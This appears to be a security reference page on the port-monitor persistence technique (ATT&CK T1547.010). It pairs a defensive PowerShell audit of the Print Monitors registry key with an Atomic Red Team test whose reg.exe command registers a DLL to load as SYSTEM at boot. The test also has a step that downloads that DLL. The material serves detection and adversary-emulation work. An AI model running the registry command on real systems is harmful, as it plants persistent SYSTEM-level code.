T1547.010
Port Monitors
Description from ATT&CK
Adversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.
The Registry key contains entries for the following:
- Local Port
- Standard TCP/IP Port
- USB Monitor
- WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
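The two loading paths described above (a bare DLL name resolved from System32, or a fully-qualified path written into the Monitors key) can both be audited from the registry. The following PowerShell is an added example written for this page; it is not part of ATT&CK or Atomic Red Team. The function name `Get-PortMonitorFindings` is made up, and the baseline table is an assumption about a default Windows install: the page itself only confirms `localspl.dll` for Local Port (see the cleanup command of the atomic test), while `tcpmon.dll`, `usbmon.dll` and `WSDMon.dll` are the in-box monitors the author expects for the other three entries.

```powershell
# Added audit example (not Atomic Red Team code): enumerate the Print Monitors key and
# flag Driver values that deviate from the in-box monitor DLLs or point outside System32.
# Assumption: the baseline below reflects a default Windows install; third-party printer
# software may legitimately register additional monitors and should be added to it.

$MonitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'

# Expected Driver values for the four monitors listed on this page (assumed baseline).
$Baseline = @{
    'Local Port'           = 'localspl.dll'
    'Standard TCP/IP Port' = 'tcpmon.dll'
    'USB Monitor'          = 'usbmon.dll'
    'WSD Port'             = 'WSDMon.dll'
}

function Get-PortMonitorFindings {
    [CmdletBinding()]
    param(
        [string]$Key = $MonitorsKey,
        [hashtable]$Expected = $Baseline
    )

    foreach ($sub in Get-ChildItem -Path $Key -ErrorAction Stop) {
        $name   = $sub.PSChildName
        $driver = (Get-ItemProperty -Path $sub.PSPath -Name Driver -ErrorAction SilentlyContinue).Driver
        if (-not $driver) { continue }   # a monitor key without a Driver value loads nothing

        $reasons = @()

        # A path separator means the spooler loads the DLL from wherever the path points,
        # which is the "fully-qualified pathname" case from the description.
        if ($driver -match '[\\/]') {
            $reasons += 'Driver is a full path rather than a System32 file name'
        }

        # Unknown monitor name, or a known monitor whose Driver no longer matches the baseline.
        if (-not $Expected.ContainsKey($name)) {
            $reasons += 'monitor not in baseline'
        } elseif ($Expected[$name] -ne $driver) {   # -ne is case-insensitive in PowerShell
            $reasons += "Driver differs from baseline '$($Expected[$name])'"
        }

        # Resolve the file the spooler would load and check its Authenticode signature.
        $path = if ($driver -match '[\\/]') { $driver } else { Join-Path $env:SystemRoot "System32\$driver" }
        if (Test-Path -LiteralPath $path) {
            $sig = Get-AuthenticodeSignature -FilePath $path
            if ($sig.Status -ne 'Valid') { $reasons += "signature status $($sig.Status)" }
        } else {
            $reasons += 'DLL not found on disk'
        }

        [pscustomobject]@{
            Monitor    = $name
            Driver     = $driver
            ResolvedTo = $path
            Suspicious = ($reasons.Count -gt 0)
            Reasons    = ($reasons -join '; ')
        }
    }
}

# Usage: run from an elevated PowerShell session; any row with Suspicious = True warrants a look.
Get-PortMonitorFindings | Format-Table -AutoSize
```

Run against a host where the atomic test below has been executed, the function returns a `Local Port` row whose reasons list both a full-path Driver and a mismatch against the `localspl.dll` baseline; after the cleanup command the row returns to baseline. Because the value is changed with a single `reg.exe ADD`, a registry value-set event on `...\Print\Monitors\*\Driver` is the natural real-time counterpart to this periodic audit.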
Atomic Tests
Atomic Test #1 - Change Windows Default Print Monitor
Register a malicious DLL as a port monitor by changing the registry key. This can be used for persistence or privilege escalation.
Supported Platforms: windows
auto_generated_guid: 0778f116-a748-49c6-9633-122401744b26
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1547.010\src\x64\T1547.dll |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d #{dll_payload} /f
Cleanup Commands:
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d localspl.dll /f
Dependencies: Run with powershell!
Description: T1547.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.010/src/x64/T1547.dll" -OutFile "#{dll_payload}"